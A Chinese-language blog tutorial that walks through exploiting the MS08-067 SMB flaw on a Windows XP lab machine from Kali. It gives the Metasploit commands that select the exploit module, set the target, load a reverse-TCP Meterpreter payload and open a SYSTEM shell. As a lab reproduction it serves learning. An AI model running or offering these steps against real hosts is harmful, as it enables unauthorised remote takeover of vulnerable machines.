您现在的位置是:首页 >其他 >MS08-067漏洞复现(Kali+MSF)网站首页其他

MS08-067漏洞复现(Kali+MSF)

cary_dan 2024-10-10 12:01:05
简介MS08-067漏洞复现(Kali+MSF)

目录:

环境准备:

漏洞原理:

复现步骤


环境准备:

靶机:Windows XP (安装在虚拟机)

攻击机:Kali

攻击工具:nmap 、msfconsole(下文简称MSF)

漏洞原理:

利用XP系统开放的445端口,使用msf对其进行攻击,从而远程到靶机,即进入到靶机的cmd界面,且拥有system最高权限,后果可想而知

复现步骤

1、使用sudo su 切换至root权限,输入密码(密码不可见,直接键入即可)

┌──(carey㉿kaliJD)-[~]
└─$ sudo su 
[sudo] carey 的密码:

2、使用nmap对目标靶机进行扫描,这里因为我们知道用的是445端口就直接对这个端口进行扫描,查看他的状态。

 这里我们看到445端口的状态是open开启的,OK,那就干他。

  3、启动我们的MSF工具,输入msfconsole后回车等待启动完成。

┌──(root㉿kaliJD)-[/home/carey]
└─# msfconsole

 到这就说名启动完成了

 4、输入ms08-067我们查询这个漏洞的信息。

msf6 > search ms08-067

 5、输入use 0 选择第一个模块进入这个攻击的武器库

msf6 > use 0

 6、输入show options,我们看看需要配置什么。

show options

这里我们可以看到RHOSTS没有值,后面的required是yes,yes表示该项必填,RHOSTS表示靶机地址(可以看到下面有个LHOST,表示攻击机的地址,一般都会默认填上本机IP地址),这里我们看到只需要吧rhosts填上

 7、这里我们利用set +name+值得格式写入靶机地址和使用的武器库(以后遇到其他的字段需要写入值时基本都是这个格式)

msf6 exploit(windows/smb/ms08_067_netapi) > set rhosts 192.168.171.130

msf6 exploit(windows/smb/ms08_067_netapi) > set payload windows/meterpreter/reverse_tcp

再次show options查看写入信息是否正确,检查正确

 8、开始攻击,run

msf6 exploit(windows/smb/ms08_067_netapi) > run

 提示连接了3个回话就表示连接成功

9、输入shell 进入Windows xp的命令行界面,至此就可以为所欲为了。

风语者!平时喜欢研究各种技术,目前在从事后端开发工作,热爱生活、热爱工作。